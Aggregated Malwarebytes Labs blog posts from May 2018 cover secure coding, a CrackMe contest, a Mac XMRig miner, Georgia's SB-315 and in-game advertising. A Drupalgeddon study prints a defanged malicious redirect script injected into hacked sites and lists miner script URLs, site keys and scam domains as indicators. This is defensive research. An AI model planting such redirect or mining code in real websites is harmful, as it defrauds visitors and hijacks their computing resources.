Techie Feeds

Why bad coding habits die hard—and 7 ways to kill them

Malwarebytes - Wed, 05/23/2018 - 15:00

Developers are usually the focus of blame when software vulnerabilities cause organizational breaches. (Sometimes, quality assurance engineers are included in the flame.) Interestingly, though, hardly anyone looks at why bad coding habits form in the first place.

We’re talking about the culture, the processes, the unrealistic deadlines, and—perhaps the worst of this bunch—the lack of awareness between the business and development sides. The former must realize that as they innovate, they need to adapt and respond to the ever-changing threat landscape; the latter must know how to write good, clean, secure code.

Reasons why programmers fail at security

Each organizational breach is a testament to something going wrong somewhere. And it’s a lot more complicated than assuming developers are just lazy at coding. To understand what’s really going on, we’ve listed some of the reasons why programmers appear like they don’t care about secure coding when, in fact, they do.

They don’t know what secure code looks like.

Most of us assume that programmers, well-versed in multiple programming languages as they are, should also know how to write secure code. This just isn’t true. According to a study conducted by CloudPassage a couple of years ago, none of the top 10 computer science programs in the US require a cybersecurity course—not even an elective one—for graduation.

While computer science, information systems, and computer engineering students are taught how to code, accredited schools are simply not teaching them security by design. Secure coding is now something programmers must educate themselves on how to do.

They don’t have enough time to spend on security.

Software developers are expected to adhere to rigid deadlines. No ifs, ands, or buts. On top of this, they also have to balance conflicting interests from multiple stakeholders, refine code functionalities, and ensure that the program is reliable and stable. Programmers have to tick several more boxes before reaching the bottom of the list, where security is. In fact, it’s more common for programmers to skip security checks, so they deploy the program as-is: a working, efficient, but vulnerable product.

Essentially, it’s half-baked.

They lack the tools needed to identify security risks.

As much as software developers would want to keep their code as risk-free as possible, they cannot. The tools needed for this are expensive and can be a hard sell for organizations that have budget constraints or who utterly fail to grasp the importance of reducing software vulnerabilities.

Leading the charge

Vulnerable software is the bane of business organizations. In this age of breaches, you’d think it’s only logical for organizations to secure vulnerable software, starting with their own. Yet, bad code remains prevalent to this day. It’s up to management to take charge and prioritize security in the development process. By adopting any or all of these suggestions to eradicate bad code, businesses can not only help software developers do a better job, but also potentially secure their reputation, data, and ongoing survival.

Shall we begin?

Train developers to write secure code.

Training is perhaps the best and most effective way to get software developers to improve their coding. To do this, management has several options: invite a third-party organization to conduct training, have their software engineers enroll in workshops outside of the workplace, or have them register for online classes.

Should they decide to hire a third party, there are some private institutions they can turn to. WhiteHat Security, for example, has a program where developers who finish the requirements and pass the exam can be certified as a WhiteHat Secure Developer (WCSD). SANS and CERT follow a similar method. It’s crucial that develops use secure coding in every stage of the company’s software development lifecycle (SDLC).8

Introduce a standard coding convention.

Depending on the programming languages your developers are using, upper management must establish secure coding standards they can adhere to. Thankfully, they don’t have to start from scratch. There are a lot of sources online they can begin looking into, adapt as-is, or modify to fit their needs.

A convention includes recommended programming styles, methods, and other coding practices. Adhering to one significantly lessens errors, makes the source code readable to other programmers, and is easier to maintain in the long run.

Create a culture of security.

Make no mistake: secure coding should be as important to company culture as it is to the overall software development process. The aim of having such a culture is to imbibe security practices so deep that they become second nature. These practices grow into valuable traits programmers can take with them anywhere.

As we keep saying, security is no longer the job of one department in a company. It is now everyone’s job to ensure that sensitive client information is kept safe and secure, and to think twice before clicking that link or opening that email attachment. If security is stressed as an important part of company culture, that mindset can extend beyond staving off breaches to keeping your customers just as safe.

Read: How to create an intentional culture of security

Create a security policy.

A policy is vital to have as this guides software developers not only on what security features to bake into their applications, but also how these should be implemented. Unfortunately, organizations often overlook this, leaving their applications, intellectual property, and other vital information open to compromise. Embedding a security policy to the SDLC is a must. If the company makes their product available to the European market, then embedding GDPR to the SDLC is essential as well.

Conduct an internal bug bounty program.

Bug bounties in general are a form of security crowdsourcing that allow people to check software and systems for flaws. Monetary compensation and/or recognition are awarded to those who find flaws deemed critical. Upper management may opt to use this scheme once the product has passed over the QA and security teams in the hopes of further reducing exploitable vulnerabilities. If they wish, they can also hold a bug bounty program for non-employees.

Set a realistic schedule.

Rigid timelines may get the job done, but they also encourage sloppy coding. A finished product doesn’t mean it’s a secure one. If security checks on code are usually ignored because of the project schedule, wouldn’t it be better for project managers to set the timeline with a little padding in case something happens and the target date isn’t met?

Today’s threat landscape no longer allows half-baked applications. A slight schedule slippage can be remedied, but a breach due to flaws that wouldn’t have been missed during code reviews could cause more problems and unnecessary expenditures for the company.

Continue to motivate developers to write good code.

This can be done by creating an environment where developers are not only required to meet standards, but want to. One way is ensuring that software programmers have the tools and equipment they need. For app developers, they may require several mobile devices (phones and tablets) they can use for testing.

Upper management must also work closely with team and project leaders to provide programmers access to necessary information they need for the project and people they can reach out to for advice. Other things that are important to developers are ergonomic furniture, a fast PC, a personal space where they can work quietly and privately, writing materials and whiteboards, and an R&R area where they can meet with other employees. Should upper management set up an incentive program for good coding? It might be the natural step to take—although, it might actually do more harm than good, so have a good think.

A word on brogramming: One may think that its presence within a company is harmless, but reality, it hurts the organization as developers outside a particular clique, especially women, are naturally excluded and made to feel unwelcome. At times, brogramming may even spark bullying in the workplace. Upper management must never cater to this subculture if they want to make the environment more welcoming to all programmers, and the company a safe place where employees can do their duties without discrimination.

Welcoming the change

Every company looking to improve their overall security posture, beginning with addressing the problem of bad code, should know that a 100 percent turnaround isn’t possible at the onset. Change is usually slow. However, after about a year of baking security into the coding process, expect a highly significant return on investment. This was the result of a study by the Aberdeen Group about companies adopting secure coding practices.

Code that works is well-designed, efficient, usable, readable, and (most importantly) secure. It is not impossible to achieve. All organizations have to do is start getting rid of bad coding habits.

The post Why bad coding habits die hard—and 7 ways to kill them appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes CrackMe 2: contest summary

Malwarebytes - Tue, 05/22/2018 - 16:00

About three weeks ago, we published our second CrackMe. It triggered a lot of interest, and we got many high-quality write-ups. Choosing the winner was really difficult!

In this post, I am going to summarize the contest and comment on the received submissions.

CrackMe 2 challenge

The topic of the challenge was Python, and its goal was to teach how the Python scripts can be packaged and integrated with native executables. The involved Python script was not obfuscated, and the user was supposed to adapt it for the purpose of finding the solution.

The CrackMe was made of three components, cooperating with each other:

  • a Python script (converted to EXE with the help of PyInstaller)
  • a native DLL, loaded with the help of the above script
  • a Python script unpacked by the DLL and injected into Actxproxy.dll

In the first level, the user was supposed to find a valid PIN to decode a URL, from which the next level was downloaded. The next level was a native DLL that was injected in the main, Pyinstaller-based EXE by the initial script.

After the second level was passed, the DLL was unpacking another piece of obfuscated Python script and injecting it into the header of Actxproxy.dll. When the DLL finished and the execution was passed back to the main script, the chunk of data was read from Actxproxy.dll, decoded, and executed. So, the Actxproxy.dll was used not as a DLL, but rather as a named memory area where the data was covertly passed from one component to another.

There were a number of other techniques used, such as:

  • A covert way to host and download a PE file: a PE was encoded as an image (with file2png.py) and hosted on a image-hosting site
  • A Reflective loader (based on the Steven Fewer’s template)
  • A modified PE header, thanks to which the PE file can be injected like a piece of shellcode
  • Changing the execution flow with the help of exception handlers
  • Using a pseudo-random sequence as an AES key (taking advantage of the fact that the standard function rand() is not really random—a sequence generated with the same seed will be the same)
Statistics

The CrackMe has so far been downloaded 956 times (653 of those were in the first weekend after the release).

We had people from all around the world participating. The most downloads were from the US (243), Israel (59), and the UK (52).

Hall of fame

The submission was counted as valid if it contained the final flag:

flag{“Things are not always what they seem; the first appearance deceives many; the intelligence of a few perceives what has been carefully hidden.” – Phaedrus}

In total, I got flags from 25 people. Congratulations to all of you, you did great!

12 people solved it during the first weekend:

    1. [write-up]
    2. [write-up]
    3. [write-up]
    4. [write-up]
    5. [write-up]

The remaining 13 solved it in the following days:

  1. May 1:
  2. May 1:
  3. May 2: [write-up] [video]
  4. May 2:
  5. May 2: [write-up]
  6. May 2:
  7. May 3:
  8. May 3: [write-up]
  9. May 3: [write-up]
  10. May 6:
  11. May 10: [write-up]
  12. May 15: [write-up]
  13. May 18: [write-up]
Write-up scoring

Due to the high quality of the received write-ups, it was hard to select the winner. In order to introduce some objective measures, several categories were used to assign points.

The first category involved an in-depth explanation of the inner workings of the CrackMe, guiding through the process of solving. This means writers should have:

  1. Explained how to identify that the executable is in reality a wrapped Python script
  2. Provided tools and an explanation of how to unpack the PyInstaller executable back to Python script
  3. Demonstrated how to find the password having an MD5
  4. Explained why the key generated is using rand() and is not really random
  5. Provided and explained a sourcecode of brutforcer for the PIN
  6. Explained how the PE file is decoded from the image
  7. Noticed and understood the PE header modification (shellcodified PE)
  8. Noticed and understood the Reflective Loader in the DLL
  9. Explained how the VEH was used to modify the execution flow
  10. Noticed what checks were made in order to prevent the DLL from running outside the Python
  11. Explained the mechanism behind the “secret console”
  12. Explained how the Actprxy.dll is used as a communication channel between the two independent modules
  13. Analyzed the injected data and minimized the set of the characters that has to be brutforced
  14. Explained what (and why) to expect in the output (in level 3 decoding)
  15. Provided and explained the script used to solve the final Python chunk

The second category was style. Writers should have:

  1. Introduced tools before they were used, showing the environment setup
  2. Provided detailed explanation of the used techniques, reaching beyond the CrackMe itself. For example, providing links where the reader can learn more.
  3. Provided graphical illustration of the taken steps. Diagrams, GIFs, videos, etc.
  4. Been especially clear and had a pleasant writing style

You could also get some bonus points for OSINT if you found:

  1. My tool to do exactly the same conversion as used in the CrackMe (file2png,py)
  2. My post explaining in detail how to unpack PyInstaller-based EXE
  3. A malware that previously used any of the descried techniques (i.e. shellcodified PE was used by Shakti Trojan, PyInstaller package was used by Telegram RAT, Reflective Loader is commonly used by multiple malware, for example the dropper of the original Petya)

Points per write-up (plus, their extra features that gave a bonus point)

  1. @Hexacorn’s write-up: 8
  2. @_qaz_qaz’s writeup: 13.5
  3. @pieceofsummer’s write-up: 8
  4. @KernelM0de‘s write-up: 8.5
  5. @Eleemosynator’s write-up: 16
  6. @LadislavZezula‘s write-up and video: 13.5
    • adding the video to the write-up was really cool!
  7. @tqkve’s write-up: 7.5
    • interesting explanation how to manually extract the pyc module from PyInstaller-based EXE
  8. @voidm4p‘s write-up: 12.5
  9. @ravitiwari1989’s write-up: 13.5
  10. @Jacob_Pimental’s write-up: 8
  11. @th3m4ks’s write-up: 12.5
  12.  @nictln’s write-up: 12
    • the best way to solve the last stage: plaintext attack instead of brutforce

The write-ups showed a diversity of ideas, each of them providing a fresh perspective and a valuable source of learning for the people who want to enter into our field. Thank you so much for your participation! As a small token of our appreciation, we decided to give Malwarebytes swag to each writeup author! You can contact me via twitter for details.

Winners

I decided to reward four authors, who’s solutions stood out:

  • @Eleemosynator
  • @ravitiwari1989
  • @_qaz_qaz
  • @LadislavZezula

Each winner can choose a book of their liking (in a printed or electronic form). Contact me on Twitter for receiving the reward. Congratulations again, and thank you for all the work that you put in writing the solution!

The post Malwarebytes CrackMe 2: contest summary appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Mac cryptominer uses XMRig

Malwarebytes - Tue, 05/22/2018 - 15:00

A new Mac cryptominer was discovered this week, after affected users saw their fans whirring out of control and a process named “mshelper” gobbling up CPU time like Cookie Monster. Fortunately, this malware is not very sophisticated and is easy to remove.

The malware became public knowledge in a post on Apple’s discussion forums, where the “mshelper” process was found to be the culprit. Digging deeper, it was discovered that there were a couple other suspicious processes installed as well. We went searching and found copies of these files.

The malware is mining for Monero cryptocurrency. Here’s a breakdown of its components.

The dropper

A “dropper” is what security researchers call the program that installs malware. Often, Mac malware is installed by things like fake Adobe Flash Player installers, downloads from piracy sites, decoy documents users are tricked into opening, and other such things.

In this case, the dropper is still unknown, but we do not believe it’s anything sophisticated. Everything else about this malware suggests simplicity.

The launcher

A file named pplauncher is installed in the following location:

~/Library/Application Support/pplauncher/pplauncher

This file is kept running by a launch daemon (com.pplauncher.plist), indicating that the dropper must have had root privileges.

pplauncher is a rather large executable file (3.5 MB) that was written in Golang and then compiled for macOS. The sole responsibility of this process appears to be the fairly simple process of installing and launching the miner process.

Using Golang introduces significant overhead, resulting in a binary file containing more than 23,000 functions. Using this for what appears to be simple functionality is probably a sign that the person who created it is not particularly familiar with Macs.

pplauncher SHA256: 8f1938d082393713539abb9dfa8bfde8e1a09721f622e6e597d4560219ffca0d The miner

The miner is the mshelper process, which is installed here:

/tmp/mshelper/mshelper

This process appears to be an older version of the legitimate XMRig miner, which can be installed on Macs via Homebrew. Getting the version information from the current XMRig gives the following results:

$ xmrig -V XMRig 2.6.2  built on May  7 2018 with clang 9.0.0 (clang-900.0.39.2)  features: 64-bit AES

Requesting the same information from the mshelper process gives the following results:

$ /tmp/mshelper/mshelper -V XMRig 2.5.1  built on Mar 26 2018 with clang 9.0.0 (clang-900.0.39.2)  features: x86_64 AES-NI

Clearly, mshelper is simply an older copy of XMRig that is being used for the purpose of generating the cryptocurrency for the hacker behind the malware. The pplauncher process provides the necessary command-line arguments, such as the following parameter specifying the user, found using the strings command on the pplauncher executable file:

--user=19531259765625 mshelper SHA256: a00f6fbb2e00d35f938534e1c20ba2e02311536bcf60be2165037d68cba141b2 Mac cryptomining on the rise

This malware is not particularly dangerous, unless your Mac has a problem like damaged fans or dust-clogged vents that could cause overheating. Although the mshelper process is actually a legitimate piece of software being abused, it should still be removed along with the rest of the malware.

Mac cryptomining malware has been on the rise recently, just as in the Windows world. This malware follows other cryptominers for macOS, such as Pwnet, CpuMeaner, and CreativeUpdate. I’d rather be infected with a cryptominer than some other kind of malware, but that doesn’t make it a good thing.

If you think you’re infected with this malware, Malwarebytes for Mac will remove it. We detect this malware as OSX.ppminer.

The post New Mac cryptominer uses XMRig appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 14 – May 20)

Malwarebytes - Mon, 05/21/2018 - 17:17

Last week, we looked at the deluge of incoming policies caused by GDPR, tackled Adobe Reader zero days, and ran through some iPhone security tips. We also caught some helpline scammers in the act, explored advergaming, got our Senate Bill game face on, and deep dived into Drupal vulnerabilities.

Other news

Stay safe, everyone!

The post A week in security (May 14 – May 20) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Vote for Malwarebytes Labs: European Security Blogger Awards 2018

Malwarebytes - Mon, 05/21/2018 - 15:00

It’s nearly time for Infosec Europe 2018, and that means it’s also time to consider voting for your favourite security blogs, podcasts, video channels, and more for the upcoming European Security Blogger Awards.

Thanks to your generous votes, we’ve been fortunate enough to pick up the award for Best Corporate Security Blog in both 2015 and 2016. This year, our blog is nominated for Best Corporate Security Blog (Category 1) again, and my personal Twitter account is up for nomination in the Best EU Security Tweeter (Category 11).

We’re up against some stiff competition in the Corporate category:

BH Consulting SecurityWatch

Security Now

Sophos Naked Security Blog

Eperi Blog

We Live Security 

The AlienVault Blogs

BitDefender

IT Security Guru 

DomainTools Blog

We’re honoured to be included among such great company, and to have the chance to take our European Security Blogger Awards tally to three. We do our best to provide readers with a non-stop mix of deep-dive security analysis, breaking news, how-to content, and cybersecurity awareness. We’re proud to do our part, whether that’s helping researchers in the trenches battle malware makers or giving customers the know-how they need to shut down scammers.

Should you wish to vote for us, please go here and select your categories of choice.

Voting closes at midnight GMT on Friday, June 1. There’s a few weeks left to show your support, and we’re grateful for each and every vote you cast our way!

The post Vote for Malwarebytes Labs: European Security Blogger Awards 2018 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Why tech companies wanted Senate Bill 315 vetoed

Malwarebytes - Fri, 05/18/2018 - 16:00

When Georgia Senate Bill 315 (SB-315) was introduced, people in the tech world anxiously awaited its fate, regardless of their geographic location. They knew that some laws initially restricted to single states become more widespread after politicians set precedents. And they knew that this law could potentially impact the way that they did business forever.

The bill passed in the General Assembly on March 29—and that was not the news tech companies were looking for. They hoped the bill would be shot down. But why?

The bill

SB-315 was a Republican-sponsored bill aiming to alter the state’s parameters on computer usage. If passed, it would have amended the original language of Georgia’s code that discusses “computer trespass.” The activities under that umbrella include deleting computer programs or data, altering or damaging hardware, and obstructing the use of a computer program. In short, Georgia’s code stated that unauthorized use only extended to malicious intent.

However, SB-315’s language is much more vague than the original Georgia code. It prohibits unauthorized computer access—period—although it doesn’t apply to people living in the same house, individuals using computers for legitimate business activities, or those engaged in active cyberdefense measures that stop or detect unauthorized use.

What prompted SB-315?

A security researcher named Logan Lamb found a vulnerability associated with Kennesaw State University’s (KSU) Center for Election Systems that exposed the details of 6.7 million voters in Georgia. He contacted the appropriate authority and received word that the issue would get fixed. A year later, Chris Grayson, a fellow cybersecurity researcher, found the vulnerability still existed.

Next, both Lamb and Grayson approached a KSU information security lecturer about the matter. That action finally got the problem fixed. Unfortunately, it also resulted in Lamb getting visited by FBI agents. They determined he didn’t do anything wrong but advised him to delete any downloaded data.

Lamb’s efforts to help protect that data would now be considered illegal under SB-315.

Tech companies raise concerns

Microsoft and Google are among the technology companies that urged Georgia governor Nathan Deal to veto the bill. In a joint letter distributed to Deal on April 15, representatives from tech companies took issue with criminalizing unauthorized computer access, saying the consequences could be damaging to Georgia’s infosec industry. They also argued against the provision of the bill that makes “hack backs” exempt.

The tech representatives asserted that the provision as written was too broad and its parameters were not clearly defined. As such, they recognized a strong potential for abuse for anti-competitive purposes rather than solely to protect networks. They also said that enabling Georgia businesses to “hack back” in defense of cybercriminals could have unintended consequences.

In addition, cybersecurity company Tripwire filed a letter with the governor’s office on April 16, arguing that SB-315 would ultimately weaken security. “SB-315 will discourage good actors from reporting vulnerabilities and ultimately increase the likelihood that adversaries will find and exploit the underlying weaknesses,” the letter said.

Potential ramifications for cybersecurity researchers

In a separate letter to Congress, 55 tech professionals warned that the “legitimate business activity” exemption of the bill was dangerously unclear. The letter stated that this term “is undefined and creates ambiguity for researchers unconnected with a business…and how activities will be qualified as ‘legitimate.’”

Experts say SB-315 would have had a chilling effect on independent researchers, specifically those that perform penetration tests. Sometimes referred to as whitehat hackers, these cybersecurity specialists look for network weaknesses and find out what would happen if they were exploited.

After collecting the results of penetration tests, the researchers contact the appropriate parties to inform them of vulnerabilities. However, some people in the cybersecurity sector wondered if by disclosing the outcomes of penetration tests, researchers would violate SB-315 and risk fines or jail time.

Hackers showed their displeasure for SB-315 by hacking several Georgia websites, including the homepages of a church and two restaurants. In all cases, the infiltrators left messages on the sites to warn that SB-315 barred the ethical reporting of the vulnerabilities that allowed the attacks.

Nods of approval for SB-315

Chris Carr, the attorney general for the state of Georgia, issued a statement after SB-315 passed in the General Assembly that outlined his support of the bill. He asserted that Georgia is one of only three states that don’t make unauthorized computer or network without malicious intent illegal.

Carr referred to SB-315 as a “common sense solution” that prevented the opportunities hackers would otherwise seize. Moreover, his press release expressed gratitude to other sponsors of the bill, including Representative Christian Coomer, and Senators Renee Unterman and Butch Miller, among others.

Senator Bruce Thompson, who introduced the bill, largely steered clear of any controversy when discussing SB-315 on his Twitter feed.

At the end of March, though, one of his tweets mentioned Chairman Ed Seltzer. When the bill was on the House floor, Seltzer reportedly said the exemptions were “big enough to drive a truck through.” That was presumably Thompson’s way to respond to critics who thought the exceptions to the bill were too narrow in scope.

Representative Tom Graves, who sponsored the bill, stated that SB-315 would provide citizens and businesses with more resources to stay safe against hacks.

Deal gives his veto

Governor Nathan Deal ultimately chose to veto SB-315. In a related statement, he mentioned that such legislation requires further discussion before enactment. Additionally, he brought up private industries and government agencies, admitting that SB-315 could make it more difficult for those entities to stay protected.

Deal hoped legislators would continue to work together to find ways to enhance the state and national security against cyberattacks.

The concerns of tech companies about the language and specific provisions of SB-315 emphasize why it’s crucial to conduct all-encompassing analyses of pending legislation. The full impacts of proposed laws are not always immediately evident—especially when it comes to technology.

The post Why tech companies wanted Senate Bill 315 vetoed appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A look into Drupalgeddon’s client-side attacks

Malwarebytes - Fri, 05/18/2018 - 15:00

Drupal is one of the most popular Content Management Systems (CMS), along with WordPress and Joomla. In late March 2018, Drupal was affected by a major remote code execution vulnerability (CVE-2018-7600) followed by yet another (CVE-2018-7602) almost a month later, both aptly nicknamed Drupalgeddon 2 and Drupalgeddon 3.

These back-to-back vulnerabilities were accompanied by proof of concepts that translated into almost immediate real-world attacks. For many website owners, this situation was frustrating because the window of time to patch is getting considerably smaller. Additionally, updating or upgrading Drupal (or any other CMS for that matter) may have side effects, such as broken templates or functionality, which is why you need to make a full back up and test the changes in the staging environment before moving to production.

Rolling out a CMS is usually the easy part. Maintaining it is where most problems occur due to lack of knowledge, fear of breaking something, and, of course, costs. While this is an earned responsibility for each site owner to do due diligence with their web properties, the outcome is typically websites being severely out of date and exploited, often more than once.

Sample set and web crawl

We decided to choose a number web properties that had not yet been validated (including all versions of Drupal, vulnerable or not). Our main source of URLs came from Shodan and was complemented by PublicWWW, for a total of roughly 80,000 URLs to crawl. We were surprised to start hitting compromised sites quickly into the process and were able to confirm over 900 injected web properties.

Many of the results were servers hosted on Amazon or other cloud providers that were most likely set up for testing purposes (staging) and never removed or upgraded. Thankfully, they received little to no traffic. The other domains we encountered spanned a variety of verticals and languages, with one common denominator: an outdated version (usually severely outdated) of the Drupal CMS.

Figure 1: Crawling and flagging compromised Drupal sites using Fiddler

Drupal versions

At the time of this writing, there are two recommended releases for Drupal. Version 8.x.x is the latest and greatest with some new features, while 7.x.x is considered the most stable and compatible version, especially when it comes to themes.

Figure 2: Drupal’s two main supported branches

Almost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in August 2015. Many security flaws have been discovered (and exploited) since then.

Figure 3: Percentage of compromised sites belonging to a particular Drupal version

Payloads

A large number of Drupal sites that have been hacked via these two recent exploits were also infected with server-side malware, in particular with XMRig cryptocurrency miners. However, in this post we will focus on the client-side effects of those compromises. Neither are exclusive though, and one should expect that a hacked site could be performing malicious actions on both server and client side.

Unsurprisingly, web miners were by far the most common type of injection we noticed. But we also came across a few different social engineering campaigns.

Figure 4: Breakdown of the most common payloads

Web miners

Drive-by mining attacks went though the roof in the fall of 2017 but slowed down somewhat at the beginning of the year. It’s safe to say that the recent Drupal vulnerabilities have added fuel to the fire and resulted in increased activity. Coinhive injections remain by far the most popular choice, although public or private Monero pools are gaining traction as well.

We are seeing the same campaign that was already documented by other researchers in early March and is ensnaring more victims by the day.

Figure 5: A subdomain of Harvard University’s main site mining Monero

Fake updates

This campaign of fake browser updates we documented earlier is still going strong. It distributes a password stealer of Remote Administration Tool (RAT).

Figure 6:  A compromised Drupal site pushing a fake Chrome update

Tech support scams (browlocks)

Redirections to browser locker pages—a typical approach for unveiling tech support scams. The most common redirection we were able to document involved an intermediary site redirecting to browser locker pages using the .TK Top Level Domain (TLD) name.

mysimplename[.]com/si.php window.location.replace("http://hispaintinghad[.]tk/index/?1641501770611"); window.location.href = "http://hispaintinghad[.]tk/index/?1641501770611";

Figure 7: A compromised Drupal host redirecting to a browser locker page

Web miners and injected code

We collected different types of code injection, from simple and clear text to long obfuscated blurbs. It’s worth noting that in many cases the code is dynamic—most likely a technique to evade detection.

Figure 8: Collage of some of the most common miner injections

Snapshots

The following are some examples of compromised sites sorted by category. We have contacted all affected parties to let them know their resources are being used by criminals to generate profit from malicious cryptomining or malware infections.

Figure 9: Education (University of Southern California)

Figure 10: Government (Arkansas Courts & Community Initiative)

Figure 11: Political party (Green Party of California)

Figure 12: Ad server (Indian TV Revive Ad server)

Figure 13: Religion (New Holly Light)

Figure 14: Health (NetApp Benefits)

Figure 15: Conferences (Red Hat partner conference) 

Figure 16: Tech (ComputerWorld’s Brazilian portal)

Malicious cryptomining remains hot

It is clear that right now, cryptomining is the preferred kind of malicious injection. There are many public but also private APIs that make the whole process easy, and unfortunately they are being abused by bad actors.

Compromised sites big and small remain a hot commodity that attackers will try to amass over time. And because patching remains an issue, the number of potential new victims never stops growing. In light of this, website owners should look into other kinds of mitigation when patching is not always an immediate option, and check what some people call virtual patching. In particular, Web Application Firewalls (WAFs) have helped many stay protected even against new types of attacks, and even when their CMS was vulnerable.

Malwarebytes continues to detect and block malicious cryptomining and other unwanted redirections.

Indicators of compromise

Coinhive

-> URIs

cnhv[.]co/1nt9z coinhive[.]com/lib/coinhive.min.js coinhive[.]com/lib/cryptonight.wasm coinhive[.]com/lib/worker-asmjs.min.js?v7 ws[0-9]{3}.coinhive[.]com/proxy

-> Site keys

CmGKP05v2VJbvj33wzTIayOv6YGLkUYN f0y6O5ddrXo1be4NGZubP1yHDaWqyflD kAdhxvdilslXbzLAEjFQDAZotIVm5Jkf MKr3Uf5CaT88pcqzAXltkBu4Us5gHWaj NL9TTsyGeVU8FbKR9fUvwkwU4qPJ4Z2I no2z8X4wsiouyTmA9xZ0TyUdegWBw2yK oHaQn8uDJ16fNhcTU7y832cv49PqEvOS PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf RYeWLxbPVlfPNsZUh231aLXoYAdPguXY XoWXAWvizTNnyia78qTIFfATRgcbJfGx YaUkuGZ3pmuPVsBMDxSgY45DwuBafGA3

Crypto-Loot

-> URI

cryptaloot[.]pro/lib/justdoit2.js

-> Keys

48427c995ba46a78b237c5f53e5fef90cd09b5f09e92 6508a11b897365897580ba68f93a5583cc3a15637212 d1ba2c966c5f54d0da15e2d881b474a5091a91f7c702

EthPocket

eth-pocket[.]com:8585 eth-pocket[.]de/perfekt/perfekt.js

JSECoin

jsecoin[.]com/platform/banner1.html?aff1564&utm_content=

DeepMiner

greenindex.dynamic-dns[.]net/jqueryeasyui.js

Other CryptoNight-based miner

cloudflane[.]com/lib/cryptonight.wasm

FakeUpdates

track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba click.clickanalytics208[.]com/s_code.js?cid=240&v=73a55f6de3dee2a751c3 185.244.149[.]74 5.9.242[.]74

Tech scams

192.34.61[.]245 192.81.216[.]165 193.201.224[.]233 198.211.107[.]153 198.211.113[.]147 206.189.236[.]91 208.68.37[.]2 addressedina[.]tk andtakinghis[.]tk andweepover[.]tk asheleaned[.]tk baserwq[.]tk blackivory[.]tk blownagainst[.]tk cutoplaswe[.]tk dearfytr[.]tk doanythingthat[.]tk faithlessflorizel[.]tk grey-plumaged[.]tk haddoneso[.]tk handkerchiefout[.]tk himinspectral[.]tk hispaintinghad[.]tk ifheisdead[.]tk itshandupon[.]tk iwouldsay[.]tk leadedpanes[.]tk millpond[.]tk mineofcourse[.]tk momentin[.]tk murdercould[.]tk mysimplename[.]com nearlythrew[.]tk nothinglikeit[.]tk oncecommitted[.]tk portraithedid[.]tk posingfor[.]tk secretsoflife[.]tk sendthemany[.]tk sputteredbeside[.]tk steppedforward[.]tk sweeppast[.]tk tellingmeyears[.]tk terriblehope[.]tk thatwonderful[.]tk theattractions[.]tk thereisnodisgrace[.]tk togetawayt[.]tk toseethem[.]tk wickedwere[.]tk withaforebodingu[.]tk

The post A look into Drupalgeddon’s client-side attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Exploring the virtual worlds of advergaming

Malwarebytes - Thu, 05/17/2018 - 16:00

Games and analytics services ran into one another headfirst recently, in a spat related to the game Conan Exiles.

Developers had to remove a tracking service, which allowed game developers to track where Steam players had come from. By generating an API key and integrating it into the game, developers could figure out which ad campaigns (for example) had directed gamers to Steam at first install.

From another game developer’s forum, where they too ended up removing the system:

Click to enlarge

[UPDATE: Redshell plugin has been removed as a part of a recent patch]

This is a commonly used service that lets us (based on anonymized user footprint) see if those who bought the game came to the Steam store from some link below a Youtube video, from Facebook campaigns etc. It helps us see which marketing campaigns worked and which didn’t – no game data are sent there at all.

Once again – both Treasure Data and Redshell are solutions used by many developers and games (you can google them, if you wish). In both cases, all the data are anonymous and are sent to servers that only we can access.

As far as Conan goes, the system in place ultimately led to bad reviews, and when the bad reviews start rolling in due to third-party apps, there can be only one end result:

Click to enlarge

From the Community Manager:

The system this review mentions is no longer in Conan Exiles as of this writing. Some gamers are so fed up with third party tracking / analytics in games that they now curate Steam lists purely for games making use of said setups.

What’s fascinating to me is that gamers often have no idea exactly how much data a developer racks up even without third-party tools or analytics in place. Even in the case of Conan Exiles, there’s currently a lack of official servers so people are being encouraged to use third-party servers run by random admins. You’re being asked to place a lot of trust in someone who can simply decide to stop paying for hosting, and who also has full control over the game settings. What happens to all your cool stuff when the admin pulls the plug or decides their friend has a better claim to the land you built your castle on?

The answer is, “It’s probably all just gone out the window, sorry.” Yet as best I can tell, there aren’t as many aggrieved voices raised in relation to rogue admins or even the “anti-tamper” technology in place.

I’ve covered Privacy Policies at length in the past, so I won’t dwell on them here.

What I do want to do is give you a link to a talk I gave at Virus Bulletin 2017, all about the Virtual Worlds of Advergaming.

If you’re even remotely concerned about a system sending “how did they get here?” data to a game developer, you should be aware that marketing, advertisements, and even social engineering designed to throw ads at you in-game have existed for a long time. In fact, it’s already starting to bleed over to augmented and virtual reality.

Did you ever wonder why you’d been funneled down a narrow corridor in a shooter, then forced to crouch behind a branded energy drinks dispenser as the only piece of available cover in a gunfight?

Click to enlarge

Or why devs would place a huge billboard at the top of a hill you had to spend a few minutes hiking toward?

Click to enlarge

Maybe you just wondered if an in-game ad network dedicated to virtual titles was potentially susceptible to dubious ads like the mock-up below?

Click to enlarge

These are all things I’ve endeavored to cover in this talk.

Here’s the pitch:

As adverts in gaming (advergaming) ecosystems continue to become more sophisticated —while the game networks themselves have effectively become social networks—so too do the potential complications for parents, children, and gamers, who just want to play without worrying about where their data is going (and how it is being used). Attempts at blocking ads on closed gaming networks, tablets, and PC games have started to turn into the same type of turf war as seen on PC desktops, and forays into VR gaming have only made this more of an issue—the more potentially realistic the game experience, the harder it becomes to disassociate product advertising from the world around you.

This presentation explains: the different types of in-game ads (static, dynamic, through the line, below the line), how adverts have effectively broken simple processes for good, which specific types of advertising are used on certain platforms, and the gamification of people in the real world. It will also illustrate some of the tricks and techniques used by advertisers to ensure that gamers can’t avoid adverts as part of their gaming experience, and will compare the oldest forms of advergaming with the newest techniques, looking at how gamers trying to block ads have led to unskippable ads which form part of gameplay, and at what the future holds for VR/augmented in-game advertising.

